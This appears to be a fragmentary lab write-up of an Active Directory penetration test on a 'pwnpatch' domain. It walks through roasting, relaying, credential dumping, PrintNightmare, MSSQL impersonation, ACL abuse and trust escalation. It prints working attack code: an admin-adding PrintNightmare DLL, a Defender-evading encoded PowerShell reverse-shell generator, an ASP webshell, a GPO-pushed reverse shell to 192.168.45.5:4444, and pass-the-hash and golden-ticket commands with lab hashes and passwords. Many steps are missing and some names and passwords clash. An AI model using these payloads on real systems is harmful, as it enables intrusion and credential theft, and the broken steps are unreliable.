Pwn&Patch

part 1 - reconnaissance and scan

Enumerate Network
First recon with cme
The first thing i personally do before launching an nmap is to scan for netbios results.

part 2 - find users

Enumerate DC’s anonymously

We get some users with the description and get a first password as samwell.tarly got
his password set up in description.
we could also retrieve the password policy before trying bruteforce

The password policy show us that if we fail 5 times in 5 minutes we lock the accounts
for 5minutes.
With enum4linux
We get the user list like cme
We also get the password policy like cme

enum4linux also get the full domain user list by enumerating members of domain
group
With rpc call
The anonymous listing is done with Remote Procedure Call on winterfell
(192.168.56.11), so we could also do this with rpcclient directly.
Get all domain users:

List guest access on shares

User but no credentials

ASREP - roasting

We create a users.txt file with all the user name previously found on
north.sevenkingdoms.local:
Password Spray
We could try the classic user=password test

We also could use sprayhound

 We now got three couple of credentials :

o mohamed.mohamed:password123 (user description)
o rayen.redteam:iseedumbpeople (asreproasting)
o hayder:hayder (password spray)

part 3 - enumeration with user

  When you get an account on an active directory, the first thing to do is always
getting the full list of users.
 Once you get it you could do a password spray on the full user list (very often
you will find other accounts with weak password like username=password,
SeasonYear!, SocietynameYear! or even 123456).

Kerberoasting
 On an active directory, we will see very often users with an SPN set.

 let’s find them with impacket

All the hashes will be stored in the file named kerberoasting.hashes

hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt –

force
share enum

 we got a domain user so we could enumerate the share another time but with a
user account

Now a new share folder is readable

Bloodhound
 Boodhound is one of the best tool for an active directory pentest. This tool will
help you to find all the path to pwn the AD and is a must have in your arsenal !

 To launch bloodhound you first need to retreive all the datas from the differents
domains.

Python ingestor - from linux

 First we will get the datas with the python ingestor :

 Let’s run the script on tech.pwnpatch.local:

  Ok now, we have all information from the domain tech.pwnpatch.local Now try
to get information from other domain pwnpatch.local:

part 4 - poison and relay

Responder
  The netntlm hashes are not usable to do pass the hash, but you can crack them
to retrieve the password.
 We create a file responder.hashes with the two hashes found and we will start to
crack it with hashcat.

 We quickly get another user account achraf.redteam:simplythebest. This is

enough to pwn the tech domain as achraf is an administrator of
pwnandpatchdc2 (the tech dc).

 ahmed’s password is stronger and cannot be break with this method. This
doesn’t mean we can do nothing. What we could do is relay ahmed connection
to a server where smb is not signed ;)

Unsigned SMB
Secretsdump
secretsdump.py 'tech'/'achraf.redteam':'simplythebest'@'192.168.45.11'
ahmed.redteam:1111:aad3b435b51404eeaad3b435b51404ee:631d04565376e65a375fc
ad27b89390c:::
secretsdump.py -hashes ':631d04565376e65a375fcad27b89390c'
'tech'/'ahmed.redteam'@'192.168.45.22'

 The sam database contains the local accounts. We will ignore vagrant as it is the
default user to setup the lab.
 The important information here is the NT hash of the local administrator user.
 We also got the LSA cache of the last connected users (by default windows keep
the last 10 users), this is useful to connect to the server even if the domain
controller is unreachable. But those cached credentials can be cracked offline
with hashcat (very slow).
 And to finish we also got the hash of the computer account. (Sometimes you will
get no useful domain accounts or no information at all on a domain joined
computer but if you get this hash you got an account on the domain!
Lsassy
 Use lsassy to get the lsass process stored credentials
 Domain accounts informations are stored in the LSASS process so make a dump
of this process can give you more domain accounts and privileges.
 Lsassy allow you to dump lsass remotely (very more convenient then doing a
procdump, download of the lsass dump file and doing pypykatz or mimikatz
locally), it do all the painful actions like dump and read lsass content for you (it
also dump only the usefull part of the lsass dump optimizing the time of
transfer). (lsassy also exist as a cme module)

Smbclient

 Connect directly to the smbserver with smbclient

Code execution : smbexec

part 5 - exploit with user

Check if we can add computer

For this attack i will use tech/dev.ops:iknownimthebest account as we previously get it
with kerberoasting in the part3.

Let’s find a cme module to check the machine account quota

PrintNightmare
To exploit printnightmare we will first check if the spooler is active on targets
Check spooler is active

 With cme

 With impacket rpcdump

Prepare the dll

 Let’s prepare the exploitation dll

 We will create a user and add it as local administrator
 Create the file nightmare.c
 #include <windows.h>

 int RunCMD()
 {
 system("net users pnightmare Passw0rd123. /add");
 system("net localgroup administrators pnightmare /add");
 return 0;
 }

 BOOL APIENTRY DllMain(HMODULE hModule,
 DWORD ul_reason_for_call,
 LPVOID lpReserved
 )
 {
 switch (ul_reason_for_call)
 {
 case DLL_PROCESS_ATTACH:
 RunCMD();
 break;
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
 break;
 }
 return TRUE;
 }
x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c

Exploit on vulnerable windows server 2019 (pwnandpatchdc2)

 Now exploit on a vulnerable windows server 2019

 with this payload we can bypass defender and add our user as administrator
 compile

x86_64-w64-mingw32-gcc -shared -opnightmare2.dll adduser.c -lnetapi32

 prepare the share

launch the exploit

python3 CVE-2021-1675.py
tech.pwnpatch.local/dev.ops:'iknowimthebest'@pwnandpatchdc2.tech.pwnpatch.loc
al '\\192.168.45.5\ATTACKERSHARE\pnightmare2.dll'

 And enjoy your new admin account by dumping the ntds :)

part 7 - MSSQL
Enumerate the MSSQL servers
Impacket GetUserSPNs.py

 First let’s try to figure out the users with an SPN on an MSSQL server

python3 GetUserSPNs.py tech.pwnpatch.local/rayen.redteam:iseedumbpeople

Nmap
CrackMapExec

 Let’s try with crackmapexec

Impacket

 To enumerate and use impacket mssql example mssqlclient.py.

 Let’s start the enumeration :

 We see only a basic view as we are a simple user

 Let’s enumerate impersonation values:

 Ok samwell got login impersonation to the user sa.

 So we can impersonate sa with execute as login and execute commands with
xp_cmdshell

 Let’s continue our enumeration as login sa this time:

  As we can see with sa login we see a lot more things. And we can see that jon.snow is
sysadmin on the mssql server
 Let’s see if there is others impersonation privileges:

 As sysadmin user (sa), we can see all the information in the database and so the
others users with impersonation privileges.

Coerce and relay

 Mssql can also be use to coerce an NTLM authentication from the mssql server.
The incoming connection will be from the user who run the mssql server.
 In our case if we tale any user like hodor for example we can get an NTLM
authentication
 start responder responder -I vboxnet0
 Connect with hodor (0 privilèges)

python3 mssqlclient.py -windows-auth

north.sevenkingdoms.local/hodor:[email protected]

Command execution to shell

 We got command execution on castelblack and also on braavos. But now we

want a shell to interact with the server.
 To get a shell we can use a basic Powershell webshell (There is one available on
the arsenal commands cheatsheet project. This is another of my projects that i
will need to improve when i get the time, but this script do not bypass defender
anymore, so let’s write some modifications):
 #!/usr/bin/env python
 import base64
 import sys

 if len(sys.argv) < 3:
 print('usage : %s ip port' % sys.argv[0])
 sys.exit(0)

 payload="""
 $c = New-Object System.Net.Sockets.TCPClient('%s',%s);
 $s = $c.GetStream();[byte[]]$b = 0..65535|%%{0};
 while(($i = $s.Read($b, 0, $b.Length)) -ne 0){
 $d = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($b,0, $i);
 $sb = (iex $d 2>&1 | Out-String );
 $sb = ([text.encoding]::ASCII).GetBytes($sb + 'ps> ');
 $s.Write($sb,0,$sb.Length);
 $s.Flush()
 };
 $c.Close()
 """ % (sys.argv[1], sys.argv[2])

 byte = payload.encode('utf-16-le')
 b64 = base64.b64encode(byte)
 print("powershell -exec bypass -enc %s" % b64.decode())

run it and get a shell

 And we got a reverseshell

part 8 - Privilege escalation

IIS - webshell

 There is a simple asp.net application on http://192.168.45.22/, this application

only give us a simple file upload functionality.

From there we can upload a basic webshell in asp : webshell.asp (at the time of
writing, this avoid defender signature)
<%
Function getResult(theParam)
Dim objSh, objResult
Set objSh = CreateObject("WScript.Shell")
Set objResult = objSh.exec(theParam)
getResult = objResult.StdOut.ReadAll
end Function
%>
<HTML>
<BODY>
Enter command:
<FORM action="" method="POST">
<input type="text" name="param" size=45 value="<%= myValue
%>">
<input type="submit" value="Run">
</FORM>
<p>
Result :
<%
myValue = request("param")
thisDir = getResult("cmd /c" & myValue)
Response.Write(thisDir)
%>
</p>
<br>
</BODY>
</HTML>

 The webshell is uploaded in the upload folder.

 And we have a command execution on the IIS server

 We can get a reverse shell with the same method used for mssql
  As a IIS service user we got SeImpersonatePrivilege privilege ! (same thing on
mssql, the service got this permission by default)

SeImpersonatePrivilege to Authority\system

 To escalate privilege from our iis (or mssql) user with SeImpersonatePrivilege to
Authority\system we can use one of the “potatoes” technic.

 A wonderfull blog post explain the different potatoes

here : https://jlajara.gitlab.io/Potatoes_Windows_Privesc

 So let’s use SweetPotato, a compilation of all the technics, “the potatoe to rule
them all”.
 Ok so we clone the project and compile it with visualStudio

 Prepare a bat file to run ou powershell basic reverse shell on execution

 Prepare the listener

 With our reverse shell play the following command

part 9 - Lateral move

Give me your secrets
Before jumping from computer to computer we must get the secrets of the owned machine.
Windows got a lot of different secrets stored in different place.
Let’s launch impacket secretsdump.py and see what we got :

Lateral Move with impacket

PsExec

 PsExec:
 upload executable
 create a service to run the executable
  Communicate with the service with namedPipe.
 Protocol : SMB

python3 psexec.py -hashes

'aad3b435b51404eeaad3b435b51404ee:e2c81c0ad55547b1b6736480360dc72d'
TECH/[email protected]

part 11 - ACL

To start we will focus on the sevenkingdoms killchain of ACL by starting with ji-
lany.blueteam (password: pwnpatchftw000)

 The path here is :

o jilany -> samir : Change password user
o samir -> hamdi : Generic Write user
o hamdi -> youssef : WriteDacl on user
 o youssef -> threat intel : add member on group
o threat intel -> support : write owner group to group
o support -> sales : write owner to group
o sales-> saif : Generic all on User
o saif -> pwnandpatchdc1 : Generic all on Computer

ForceChangePassword on User (jilany -> samir)

 This one should never be done in a pentest (unless the customer is ok with that).
You don’t want to block a user during your audit.
 As jilany.blueteam we will change samir.blueteam password

 We set the new samir password.

 And verify the password is ok.

GenericWrite on User (samir -> hamdi)

Target Kerberoasting

 First let’s do a target Kerberoasting, the principe is simple. Add an SPN to the
user, ask for a tgs, remove the SPN on the user.
 And now we can crack the TGS just like a classic kerberoasting.
 Shutdown have done a tool which do all the work for you :
 https://github.com/ShutdownRepo/targetedKerberoast

python3 targetedKerberoast.py -v -d pwnpatch.local -u samir.blueteam -p hacked

--request-user hamdi.manager
Shadow Credentials
This was already done previously in this blog, one of the fastest exploitation is with certipy:

WriteDacl on User (hamdi -> youssef)

 Now we can use dacledit.py

 First let’s look at hamdi’s right on youssef:

python3 dacledit.py -action 'read' -principal hamdi.manager -target
'youssef.blueteam' 'pwnpatch.local'/'hamdi.manager':'TaskKill3r'

 Ok now change the permission to “FullControl” and see the modification

python3 dacledit.py -action 'write' -rights 'FullControl' -principal ham-
di.manager -target 'youssef.blueteam'
'pwnpatch.local'/'hamdi.manager':'TaskKill3r'

python3 dacledit.py -action 'read' -principal hamdi.manager -target

'youssef.blueteam' 'pwnpatch.local'/'hamdi.manager':'TaskKill3r'

 Ok now we can :
o change tyron password
o do a target kerberoasting
o do a shadow credentials
 Let’s just use shadowcredentials :

certipy-ad shadow auto -u [email protected] -p 'TaskKill3r' -

account 'youssef.blueteam' -debug

Add self on Group (youssef -> threat intel )

 We now got youssef so we can add us into the threat intel group

python3 ldeep ldap -u youssef.blueteam -H ':c7fda74f5298704161c803299cce25fe' -d

pwnpatch.local -s ldap://192.168.45.10 search '(sAMAccountName=youssef.blueteam)'
distinguishedName
python3 ldeep ldap -u youssef.blueteam -H ':c7fda74f5298704161c803299cce25fe' -d
pwnpatch.local -s ldap://192.168.45.10 search '(sAMAccountName=threat intel)'
distinguishedName

Let’s see the members of threat intel

 Let’s Add youssef to threat intel

 See the result

AddMember on Group (threat intel -> support)

 Now as youssef we are in the threat intel, so we can add a member to supports’s
group.
 So we just add youssef just like we did before

 See the result

python3 ldeep ldap -u youssef.blueteam -H ':c7fda74f5298704161c803299cce25fe' -d

pwnpatch.local -s ldap://192.168.45.10 membersof 'support'

WriteOwner on Group (support -> sales)

 Now with the writeOwner privilege we can change the owner of sales to own the
group
  Just like before we will use the impacket

python3 owneredit.py -action read -target 'sales' -hashes

':c7fda74f5298704161c803299cce25fe' pwnpatch.local/youssef.blueteam

python3 owneredit.py -action write -new-owner 'youssef.blueteam' -target 'sales' -

hashes ':c7fda74f5298704161c803299cce25fe' pwnpatch.local/youssef.blueteam

Let’s see the result :

 And the owner of sales group is now youssef.blueteam

 As owner of the group we can now change the acl and give us GenericAll on the
group

Generic all on user (sales -> saif)

 Now tyron is in sales so we can take the control of saif with the genericAll on saif
 let’s change saif password
Let ‘s verifie

GenericAll on Computer (saif -> pwnandpatchdc1)

 Shadow credentials is now include with certipy

NT hash for 'PWNANDPATCHDC1$': 4c57c7174c3e5bdd94b9ee6852ee9077

 Now we got the tgt and the NT hash of PWNANDPATCHDC1$

 Obviously we can do a dcsync because pwnandpatchdc1 is a DC, but instead
let’s try to directly get a shell
 To do that the easiest way is using s4u2self abuse

machine account to administrator shell

s4u2self abuse
export KRB5CCNAME=./pwnandpatchdc1.ccache
python3 getST.py -self -impersonate "Administrator" -altservice
"cifs/pwnandpatchdc1.pwnpatch.local" -k -no-pass -dc-ip 192.168.45.10
"pwnpatch.local"/'pwnandpatchdc1$'

 And than we use that ticket to connect as administrator

wmiexec.py -k -no-pass
pwnpatch.local/[email protected]
GPO abuse

 There is a GPO abuse on the tech domain

 We get the id from bloodhound and launch the exploit with :

python3 pygpoabuse.py tech.pwnpatch.local/mohamed.mohamed:'password123'

-gpo-id "B855FFB9-1FCD-4B98-A4D5-6D3E1ED1F7EB"

 Now let’s try to get a powershell reverseshell

python3 pygpoabuse.py tech.pwnpatch.local/mohamed.mohamed:'password123' -

gpo-id "B855FFB9-1FCD-4B98-A4D5-6D3E1ED1F7EB" -powershell -command "\$c =
New-Object System.Net.Sockets.TCPClient('192.168.45.5',4444);\$s = \$c.GetStream();
[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){ \$d =
(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i); \$sb =
(iex \$d 2>&1 | Out-String ); \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> '); \
$s.Write(\$sb,0,\$sb.Length); \$s.Flush()};\$c.Close()" -taskname "MyTask" -
description "don't worry" -f
  And a few moments later we get the powershell reverseshell

part 12 – Trusts
Enumerate Trust
 Let’s enumerate the trusts:

We can see

 A domain bi-directional trust between tech.pwnpatch.local and pwnpatch.local

(Child / parent relation)

Domain Trust - child/parent

(tech.pwnpatch.local ->
pwnpatch.local)
 Ok now imagine you have pwn the domain tech.pwnpatch.local you have dump
the ntds and you got all the NT hash of all the tech domain users.

raiseChild.py tech.pwnpatch.local/ahmed.redteam:'FightP3ace!'
  This create a golden ticket for the forest enterprise admin.
 Log into the forest and get the target info (default administrator RID: 500)
 All the job is done with one command, if you are lazy you don’t even need to
understand x)

Golden ticket + ExtraSid

 We have done the exploitation on one command with impacket

raiseChild.py, now let’s just do the same but step by step and create the
golden ticket.
 First dump the krbtgt of the domain we own

secretsdump.py -just-dc-user tech/krbtgt

tech.pwnpatch.local/ahmed.redteam:'FightP3ace!'@192.168.45.11

 Now get the child and parent domain SID

# dump child domain SID

lookupsid.py -domain-sids
tech.pwnpatch.local/ahmed.redteam:'FightP3ace!'@192.168.45.11 0

# dump parent domain SID

And now create the golden ticket : we add “-519” at the end of the extra-si

Trust ticket - forge inter-realm TGT

 Another way to escalate from child to parent is by extracting the trust key and use it to
create our trust ticket
 The trust key can be found by targeting the netbios name of the domain on the ntds